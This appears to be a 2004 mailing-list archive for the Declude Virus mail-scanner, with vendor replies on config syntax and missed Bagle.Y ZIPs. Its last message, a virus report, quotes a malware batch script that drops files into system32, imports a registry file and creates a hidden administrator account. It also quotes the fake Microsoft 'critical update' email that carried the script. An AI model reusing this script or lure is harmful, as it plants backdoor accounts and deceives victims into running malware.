Re: [Declude.Virus] Keep sending out viruses notice for forging virus?
Do I need to change all the similar line to just 1 space or tab, like BANEXT EZIP, will it work if there is more than 1 space? Only the commands in the .eml files have the one space/tab limitation. -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.Virus.The archives can be found at http://www.mail-archive.com.
RE: [Declude.Virus] 8.11 possible problem
Nothing looks wrong, I've just had that one instance of a .cpl making it through (and it was, of course, virus-laden). Do you have the Declude Virus log file entries for the E-mail? -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.Virus.The archives can be found at http://www.mail-archive.com.
RE: [Declude.Virus] 8.11 possible problem
Unfortunately, no. I'm not able to identify which e-mail it was - McAfee or human error (I actually believe McAfee) blew the e-mail away. In that case, I can't think of anything that you can do to track down what happened. Without the E-mail that got through or log file entries to work with, I can come up with some possible scenarios as to what happened, but it probably wouldn't even be possible to prove or disprove any of them. -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.Virus.The archives can be found at http://www.mail-archive.com.
[Declude.Virus] Bagle.Y In ZIP File Got By?
Bagle.Y in a ZIP file got by our Declude scanner. Should this be caught by Declude? Dan begin:vcard fn:Dan Star n:Star;Dan org:Engman-Taylor Co. adr:;;W142 N9351 Fountain Blvd;Menomonee Falls;WI;53051;USA email;internet:[EMAIL PROTECTED] title:Manager of Market Analysis tel;work:262-946-0322 tel;cell:262-853-9564 x-mozilla-html:TRUE version:2.1 end:vcard
Re: [Declude.Virus] Bagle.Y In ZIP File Got By?
Bagle.Y in a ZIP file got by our Declude scanner. Should this be caught by Declude? Every virus should be caught by Declude. What does your Declude Virus log file say for the E-mail? Are your virus definitions up-to-date? Are you running the latest beta of Declude Virus, with a line BANEXT EZIP in the \IMail\Declude\virus.cfg file? -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.Virus.The archives can be found at http://www.mail-archive.com.
Re: [Declude.Virus] Bagle.Y In ZIP File Got By?
On 5/4/2004 11:00 AM, R. Scott Perry wrote: Bagle.Y in a ZIP file got by our Declude scanner. Should this be caught by Declude? Every virus should be caught by Declude. What does your Declude Virus log file say for the E-mail? Are your virus definitions up-to-date? Are you running the latest beta of Declude Virus, with a line BANEXT EZIP in the \IMail\Declude\virus.cfg file? I wasn't aware of the BANEXT EZIP option. Thanks for pointing that out. Dan [AUTOMATED NOTE: Your mail server [208.44.131.161] is missing a reverse DNS entry. All Internet hosts are required to have a reverse DNS entry. The missing reverse DNS entry will cause your mail to be treated as spam on some servers, such as AOL.] --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.Virus.The archives can be found at http://www.mail-archive.com.
[Declude.Virus] New virus?
I've just received a fake microsoft email with a 744kb patch attached. It was not detected by my Norton, not by F-Prot, nor AVG or McAffee. In this patch it has a start batch file which does this: @echo off copy _sys1.cab %windir%\system32\raddrv.dll cls copy _user1.cab %windir%\system32\admdll.dll cls copy data1.cab %windir%\system32\cmdll32.exe cls copy layout.bin %windir%\system32\settings.reg cls copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX cls regedit.exe /s %windir%\system32\settings.reg net user system_support {u-r-fucked} /ADD /ACTIVE:YES /EXPIRES:NEVER /TIMES:ALL net localgroup Administrators system_support /ADD cls UPDATE.EXE cls exit I've attached the email without the virus so you can have a look at it. Adrian ---BeginMessage--- Critical announcements An important security announcement to all Microsoft Windows users! Critical Security Update for Microsoft Windows (KB2856093) A critical security issue has been identified that could allow an attacker to compromise a computer running Windows and gain control over your system and files. This issue has been discussed in KB2856093 Microsoft Knowledge Base. Microsoft Security Response Team recommends to protect your computer by installing this update from Microsoft. Patch Information: Type: Critical Security Update Vulnerability: High Vendor notified: April 29, 2004 Update Release Date: May 02, 2004 Download Size: 744 KB, 2 minutes @ 28.8 modem File Name: WINDOWS-KB2856093-X86-ENU.EXE Affected Versions: Microsoft Windows 95/98/ME/NT/2000/XP/2003 To install this update, follow these instructions: 1 Download WINDOWS-KB2856093-X86-ENU.EXE file from Windows Update site or open an attached file. 2 Launch WINDOWS-KB2856093-X86-ENU.EXE and follow on-screen instructions. 3 After you install this item, you may have to restart your computer, to ensure a full protection. ©2004 Microsoft Corporation. All rights reserved. Terms of Use | Privacy Statement ---End Message---